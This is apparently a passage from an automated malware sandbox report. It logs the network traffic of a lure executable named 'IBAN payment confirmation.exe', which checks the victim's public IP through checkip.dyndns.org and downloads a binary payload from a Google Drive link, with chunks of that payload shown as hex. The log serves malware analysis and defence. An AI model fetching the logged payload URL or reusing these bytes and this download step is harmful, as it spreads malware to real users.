                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                            Dec 3, 2024 15:20:34.342398882 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 3, 2024 15:20:34.775563002 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:34 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: d4e19ba1d9b852bc98c3794ee313112a
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.749909132.226.247.73803824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 15:20:37.248975992 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 3, 2024 15:20:38.604399920 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:38 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: fe89259838b3c01fa6bca858ed1688ae
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.749919132.226.247.73803824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 15:20:40.758305073 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 3, 2024 15:20:43.170118093 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:42 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 6bb502e966f7020f28367ae038b8f546
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.749931132.226.247.73803824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 15:20:45.431863070 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 3, 2024 15:20:46.783482075 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:46 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 46062f5dd01c77f50ab2ddd879e4cbec
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            4192.168.2.749946132.226.247.7380
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 15:20:51.650223970 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 3, 2024 15:20:53.140886068 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:52 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 09f2d8fca222a01fac4760a008054636
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.749841172.217.19.1744433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-03 14:20:10 UTC216OUTGET /uc?export=download&id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                            Host: drive.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-03 14:20:11 UTC1920INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:10 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: script-src 'nonce-vsQNIkAoAH3M1yCYgJp1mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.749850142.250.181.14433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-03 14:20:13 UTC258OUTGET /download?id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh&export=download HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-03 14:20:15 UTC4914INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Security-Policy: sandbox
                                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Disposition: attachment; filename="xzHLEK225.bin"
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 94272
                                                                                                                            Last-Modified: Tue, 03 Dec 2024 00:09:57 GMT
                                                                                                                            X-GUploader-UploadID: AFiumC5TBMeYF6Rp9S8LbpCX4Ym-qNDcKaA3rvXo8lnK38qaa2q2hMd4BB81yps3ZuhzGP2ENNXF_IQ9bQ
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:15 GMT
                                                                                                                            Expires: Tue, 03 Dec 2024 14:20:15 GMT
                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                            X-Goog-Hash: crc32c=x0iqHg==
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-12-03 14:20:15 UTC4914INData Raw: 0f 11 0a 23 8e 31 53 3b 2f 9b d3 b2 70 dc 93 96 77 ff 81 64 95 6c 49 89 b5 a3 58 ab 8f 4b fd 00 24 a9 12 06 6c 02 88 44 0c 81 f4 22 ad 60 d2 e1 96 19 cd 0d 61 ff 36 98 5b 71 03 ba 10 89 5a cd 68 b7 fd 6e 93 f0 82 14 ec 8e 53 a1 5d 15 11 91 e7 53 c3 80 0b 67 bd cc c9 7b 8b f8 a6 c5 7c 01 ba ac 65 e6 d1 a6 28 bb ef 74 62 dc c2 45 63 e1 b6 fa c0 ae 33 ca 05 84 44 ee 79 76 41 c3 ba 2b 36 31 fd 43 42 3a 1b 19 45 35 3d 28 eb fc a1 a5 84 d2 bf a7 cf ed 19 81 00 7f 8e 6d bd 8b ad 14 08 ed 07 8d d5 e4 88 5f 4e d7 c8 07 92 92 35 a6 40 78 60 39 e2 92 62 2d ff 35 94 6b 8c a7 0c 7f b7 9d 1e 09 54 bb 3f 15 45 7c e0 50 15 b6 22 e8 e8 e3 20 90 cd 3f c0 9e 59 4c c7 ad e6 af 02 ff 14 45 2b fb 73 57 04 5e ee 9c 59 7b 11 16 f1 61 d3 cd 00 76 3b bb 9a 93 dc 5d 79 47 66 a7 d0
                                                                                                                            Data Ascii: #1S;/pwdlIXK$lD"`a6[qZhnS]Sg{|e(tbEc3DyvA+61CB:E5=(m_N5@x`9b-5kT?E|P" ?YLE+sW^Y{av;]yGf
                                                                                                                            2024-12-03 14:20:15 UTC4872INData Raw: cf 78 b4 f8 fb fe 5a f9 7f ed 0b 77 78 52 df 3d fe 02 06 9b 86 1f 9c f0 79 b8 1f 65 54 87 d6 f5 d0 d1 a3 4b a1 3d 0c 50 e2 67 cd 5e 86 5d ef 02 cf 24 2f 71 10 d1 39 6f b6 ef 31 86 ef aa 6e b2 13 5c 0a 73 dd 3f 1d 67 c9 f3 bf c2 fe 7a 7a e4 05 dd e0 5e 9f a8 a3 48 b2 ba 44 ec 5e 87 55 e9 8a ed 80 91 14 9b 59 5f 59 9a 46 a7 2c 3f e2 b8 b9 7e cb 3c c5 03 5b c5 91 82 ad b3 6e ba c6 3e 29 14 94 f0 e8 d2 96 1f 5c be 73 c1 eb 95 40 4d f8 02 16 21 2e eb a5 c5 51 c0 26 2f ff cf c9 27 13 ce 2b 4f 7b 87 dc 58 f9 2e c9 45 dd 9d 97 d7 33 de 40 f2 ff d8 ef 07 79 ae ec df 74 94 70 8f 14 6e 00 c3 b5 3d 6a 5a e6 2a 21 14 c4 29 59 f5 27 2c a8 92 9f 2f 51 1b 5e 6b d6 c9 3d 46 79 92 1c 70 a0 5c 06 3e d4 3a 96 c7 73 cb 23 f0 2a dc 8f 6f 38 98 7f c8 b0 8e 0a 3a af 50 4a b4 8c
                                                                                                                            Data Ascii: xZwxR=yeTK=Pg^]$/q9o1n\s?gzz^HD^UY_YF,?~<[n>)\s@M!.Q&/'+O{X.E3@ytpn=jZ*!)Y',/Q^k=Fyp\>:s#*o8:PJ
                                                                                                                            2024-12-03 14:20:15 UTC1320INData Raw: 0f 32 64 0c b9 00 ec 5b f5 38 5d 56 49 b1 1d 1e 0c a7 dc d5 db fa 76 3a cf 28 e0 bf 19 0f 91 2e 72 3b ef b7 b8 39 11 d7 a4 56 8f 8c 12 7e de 30 c5 1d 62 7a 04 e1 42 10 c3 4d 63 73 84 eb 28 70 3d eb dd ae 85 ef 6b 89 d1 4e be d1 8c fa 55 e0 f5 3b b8 39 9d 57 00 46 09 74 33 d0 51 cb 1b 98 02 87 b3 fb 08 f3 88 6e ad 88 df 84 4d 84 17 17 7d a9 1a 95 36 a0 17 bc fd 93 39 d0 da 5b 08 47 f4 5c 22 d0 41 a6 86 2b 03 7e 47 63 da d7 33 c6 e4 d4 33 ab 37 24 48 28 70 a1 40 25 11 b0 90 51 8f 02 fb fb d4 e4 9d 9e 41 8d c2 fc fa 4b ea b7 22 57 7f e8 1b 03 0c 9d 17 16 15 8e 25 cf e6 78 27 d7 0d 86 34 fc e7 12 9d d4 c8 0e 65 f5 35 a2 f9 45 e0 99 96 74 84 45 cf d0 d5 9d 38 e9 ad d6 29 47 1f be 20 c5 d4 fb f9 0d 0b a9 ef 87 ee 77 59 b7 24 78 32 01 e4 36 ec 61 7a e5 5a 85 03
                                                                                                                            Data Ascii: 2d[8]VIv:(.r;9V~0bzBMcs(p=kNU;9WFt3QnM}69[G\"A+~Gc337$H(p@%QAK"W%x'4e5EtE8)G wY$x26azZ
                                                                                                                            2024-12-03 14:20:15 UTC1390INData Raw: 4b a0 b4 0b b0 14 e4 58 de cf 8e 76 e4 a0 73 c7 4d c3 d1 3f 98 1d 79 df 8c c3 0f c5 40 cc 5a a4 81 c0 c3 59 36 df 2f 63 5a 17 dc 52 73 21 d8 43 f1 0c 85 d5 11 71 30 f9 f5 bb c2 20 7c 83 7b 6e 46 86 72 7b 2a 25 00 c3 a4 3d f9 5a e6 2a 21 d9 c2 70 5f f2 27 76 d7 9f 9f 2f 57 69 d1 60 ac 2e 15 0e 79 92 16 1f 28 6c 0c 34 9e 47 84 c7 5f cf 50 75 2a af 5c 7c 3f 83 72 bd a8 b1 0a 30 bf 72 33 50 46 18 86 d7 f1 ae b0 61 e9 e8 23 05 4b 47 0a 03 5f 72 bf 21 8b 23 96 21 2d 98 aa a5 15 37 2c ad 33 59 3a 0c 0f d3 3c 92 25 bf 91 91 25 b2 32 59 af bd 41 f6 ca 8e 00 15 70 da e0 72 f5 b0 bc 8a 0f 4c ca 44 42 0b d7 91 d2 e6 f9 da 20 21 8d c7 d8 6a 21 e8 b0 d8 a7 b6 5e 3b 3a c5 8e ed 77 67 d1 9b 53 34 49 78 ab b8 49 54 08 a4 56 96 1e 03 79 55 37 d6 15 50 69 0d c8 e3 10 b8 0b
                                                                                                                            Data Ascii: KXvsM?y@ZY6/cZRs!Cq0 |{nFr{*%=Z*!p_'v/Wi`.y(l4G_Pu*\|?r0r3PFa#KG_r!#!-7,3Y:<%%2YAprLDB !j!^;:wgS4IxITVyU7Pi
                                                                                                                            2024-12-03 14:20:15 UTC1390INData Raw: 5b 6c 58 bf 7b ba 8a af cc dd 89 10 0c 07 70 7a cb 60 38 7e 8a 06 91 9f 0f 8d f9 64 65 05 65 2e a2 91 fd c6 d3 3e 33 df a6 15 23 18 67 c4 3b e3 4f fe 1a a0 ab 3d 71 1a 62 02 f7 a7 fc 2c 5c 26 70 e3 e2 3f 5b 02 0f c8 29 0e 78 bb cd 64 d1 ab 41 5f f5 17 c6 e7 4c 8e 93 9e ba b2 b0 93 dd 4d 93 43 78 aa 3d fe 89 14 65 5c 3e 18 80 51 c4 23 06 7a 94 bf 62 ce da c4 3b 5b d4 83 a8 ae b2 7f a9 d1 97 b6 0e 82 e9 e0 ec b1 1b 22 a0 62 d5 fe fd 5c 52 d8 39 6e be 3a fa b4 54 5f b9 66 ae ee db d2 42 a3 d1 16 b5 15 01 22 59 d8 2f ce 50 e9 1d 8b c4 24 bd 2d c0 06 a9 c7 31 68 b8 f9 ae 58 80 61 9e ad 01 c4 c3 bf 58 eb 45 f7 3e 33 1a ea 9e 5d f2 2d 74 98 8f 9f 25 46 7f be 82 d3 b9 65 12 59 83 00 6d b1 46 06 44 bb b7 84 c7 79 e2 5e 75 3c ae 17 66 3f f9 16 54 25 8e 00 1b bf 40
                                                                                                                            Data Ascii: [lX{pz`8~dee.>3#g;O=qb,\&p?[)xdA_LMCx=e\>Q#zb;["b\R9n:T_fB"Y/P$-1hXaXE>3]-t%FeYmFDy^u<f?T%@
                                                                                                                            2024-12-03 14:20:15 UTC1390INData Raw: 19 49 7b 13 44 39 7a d3 1d 29 38 3b bb d0 98 ca f0 20 47 66 a4 dc c4 45 be 1a 4e 78 07 b2 58 ea 81 e9 51 ef bc d0 e3 06 f1 fe fa c5 34 19 05 a3 ed 0e cd b5 b5 7d 6e e9 ab 4a a6 c7 e8 91 28 e5 fb ab 19 ba 2c 17 af cc fc 6f 89 e7 f6 13 0c ec 90 fc 20 00 c1 67 3f 3b 22 e3 01 67 3f a3 b1 37 b9 89 bd 67 3f 19 a5 27 14 61 27 17 a1 e2 99 13 58 d3 7d 02 cc 16 ea 39 73 45 5e 7b 89 67 09 b6 63 49 bb 7d db 07 ff d6 d7 96 7f e6 07 7a 58 b6 b6 57 9b 86 06 9b 8c 0e 94 98 96 31 1f 6f 4d 87 ce f0 eb 69 f3 35 df bf 79 41 e8 67 c5 1d fd 4c e7 7d de 5a 3d 70 7f d4 11 e4 bc ef e7 8e bf cf 75 61 28 81 14 ca 51 66 1d 6d c8 3c 66 d9 c0 43 4e f2 0d 59 9a 41 45 a8 97 48 b2 ba 99 fb 4d 80 41 ff a2 0a fe 89 1e 88 59 f3 2f b4 6e e4 3a 17 69 ab b7 74 cc cc ab 11 5f d4 9e 93 b4 b3 6e
                                                                                                                            Data Ascii: I{D9z)8; GfENxXQ4}nJ(,o g?;"g?7g?'a'X}9sE^{gcI}zXW1oMi5yAgL}Z=pua(Qfm<fCNYAEHMAY/n:it_n
                                                                                                                            2024-12-03 14:20:15 UTC1390INData Raw: 10 fc df 45 13 c9 f8 fa c0 a4 39 ca 03 ac bc ee 79 7c ca c4 83 6d 39 2e 47 4b 31 59 12 d4 62 81 34 16 7c c1 f5 bd 82 73 9f d7 bb a4 76 9c b2 12 ae 08 cb 3f d0 7d 6a de 62 d0 e2 97 fd 31 66 af a1 55 be c1 66 f6 42 c2 04 5c ca 92 67 36 dc 47 ea 77 8c d7 63 aa e7 d8 18 1a 1c b2 2d 12 80 da 89 e1 65 d9 f7 e8 e8 e5 33 95 3c 3a ea 0c 52 4d 91 be ee d8 0b d3 57 4b 03 f8 72 57 0e 31 34 18 58 71 7e 33 f0 61 d9 45 95 76 3b bd c9 9a cd 74 6d b9 67 b6 da d2 67 50 e4 4f 61 1a 5d 52 cb 9e d2 fe fe b9 f6 fb 17 8d a5 fa fd e3 08 0c 8b 78 7c 2f a8 a6 08 70 9a 52 61 86 cd c7 13 d2 e5 f1 a9 20 46 5e 8b b9 df 8a 11 5a 88 0a 15 63 b9 83 f4 01 6b 6c 6f 50 43 31 e6 0b 5e 01 d1 53 38 aa f0 ba 46 ca 84 a5 2d 03 8c 2e 17 ae ff 86 16 58 a9 78 21 5c 1d f9 3f 74 b7 71 3d 8b 61 77 44
                                                                                                                            Data Ascii: E9y|m9.GK1Yb4|sv?}jb1fUfB\g6Gwc-e3<:RMWKrW14Xq~3aEv;tmggPOa]Rx|/pRa F^ZckloPC1^S8F-.Xx!\?tq=awD
                                                                                                                            2024-12-03 14:20:15 UTC1390INData Raw: 17 1e 07 02 ee 2a 47 a2 e6 ae a3 aa b7 1b d9 57 ed fa 7c dd 01 90 cf f4 c6 c6 ca c8 0b 40 9c 68 1d dc e8 01 15 14 33 b9 56 46 f7 6f be c8 bc 5f 7e a6 b9 c4 d4 1a f0 3b 37 11 ca a0 91 a4 2d 5c 60 9a 01 42 04 e9 b1 75 80 3e a7 ec 37 85 90 de 52 45 12 50 bb 36 e8 6d 7f 94 82 60 11 e8 fe 45 89 23 ea 11 9b 49 ad c0 91 0e 15 5f c9 89 0b 9d d0 27 c5 7c 0b ac 52 66 b9 c2 aa 39 b7 c3 39 7f 51 fd 45 63 e0 93 ec b2 48 27 ca 75 26 61 f9 70 d4 e4 db c8 07 2d 2e 37 ef 67 97 03 d0 c6 a8 26 16 60 c8 f5 bd 4f 84 84 c6 b8 20 5b ef 13 3c 8e 0e ac 47 eb db 7c cd 6f fb f8 e8 f2 31 6e ba b7 2a fe 93 66 86 27 97 0b 5c cc 9b 6f 27 ca 32 83 bd 9f a0 1d 78 f6 de 20 e9 e6 45 c3 15 f2 98 85 c4 3d 85 22 e8 e2 f0 2e 90 05 6d c2 9f 58 93 97 ad cc 88 1f ff 14 4d 2b fb 73 44 04 5e 30 4e
                                                                                                                            Data Ascii: *GW|@h3VFo_~;7-\`Bu>7REP6m`E#I_'|Rf99QEcH'u&ap-.7g&`O [<G|o1n*f'\o'2x E=".mXM+sD^0N
                                                                                                                            2024-12-03 14:20:16 UTC1390INData Raw: 94 ce 9f e2 66 08 00 38 80 72 73 14 e8 dd 0a ca 58 00 33 9c 5a 9d 4d b1 f1 52 52 9b d8 98 8a 44 19 35 16 77 6a 9a 75 ed a1 b7 c0 be 2f 1a 04 44 f6 4a e8 1f 72 b2 ef 6f 78 9f 23 14 a6 45 85 98 6b b4 9e 5a e5 40 d2 c3 d5 62 50 08 f2 22 9e 0f b6 20 05 57 b0 6d c5 2a 5a f6 88 f7 34 79 4a 22 25 6b 1d 69 22 60 58 8a 59 ae e1 fa a0 7a 04 03 32 af 41 b4 c3 2c f6 50 df 35 d3 ce 06 d2 20 78 4c 07 02 e4 68 d2 a2 e6 b8 b0 a3 a6 56 cd a9 ed f2 46 c8 0b fa 30 f5 d5 fe db c3 36 56 ab de 35 04 e2 10 1a 09 5f 9a 56 3c ce 28 96 5d b6 55 78 b3 94 3c d4 1a d1 10 30 00 26 a1 91 ae 23 3e b0 e8 9d 58 08 91 ac fa 9c 3e d1 ec ba 85 90 d2 5c f1 7d 83 bd 25 eb 7a b4 83 f6 94 07 ef b6 44 a0 a2 ea 19 80 58 21 ab 9c 0b 17 d2 19 89 7b 8d f5 ae d4 7b 73 c4 b0 65 96 be 73 28 bb e9 67 66
                                                                                                                            Data Ascii: f8rsX3ZMRRD5wju/DJrox#EkZ@bP" Wm*Z4yJ"%ki"`XYz2A,P5 xLhVF06V5_V<(]Ux<0&#>X>\}%zDX!{{ses(gf
                                                                                                                            2024-12-03 14:20:16 UTC1390INData Raw: e6 db f4 31 a6 5c be c7 fb 76 81 db ca 10 71 1e 5b 38 28 7b c5 4f 90 b0 23 f4 f8 77 94 e4 1a d3 49 ea 77 72 60 45 d1 25 96 16 1a 5d ce fa 65 3d 3a 8a af c3 d5 66 8c 21 f9 a0 bc 98 83 37 e4 bd 80 7b 44 e7 ba 0b 20 23 8c 60 c9 14 44 7d ce b2 75 81 3b 07 95 6b 41 d3 31 54 3f d8 1f 9f bb 83 09 33 35 1f b1 3b db 81 3d 26 b4 58 c7 be 69 fc ec 3d e4 f3 8e ed 98 ff 03 9a ce e2 e0 59 7f de a1 8e c1 66 78 6e c8 96 00 93 13 ed bc ad c7 dc 09 91 bf 51 e7 70 ac dd 61 f6 96 c2 88 8e ec 53 2b 65 31 75 f5 00 4e 84 a6 f9 2f 8d 3f 1e 25 34 79 e1 7b 2e 9b 5c 65 69 9f 26 e7 d9 59 8e 89 64 89 85 5a 01 40 d2 c3 44 68 3f 57 f6 22 94 0f b8 1f 46 44 b7 7a d1 3e 5c c8 68 22 eb 86 62 88 fb 7b 32 49 00 67 2a 1c 56 a0 91 bd 27 7a 04 0f 83 f0 41 9e 88 18 4a 50 df 33 c0 cb 15 c3 24 0a
                                                                                                                            Data Ascii: 1\vq[8({O#wIwr`E%]e=:f!7{D #`D}u;kA1T?35;=&Xi=YfxnQpaS+e1uN/?%4y{.\ei&YdZ@Dh?W"FDz>\h"b{2Ig*V'zAJP3$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.749886104.21.67.1524433824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
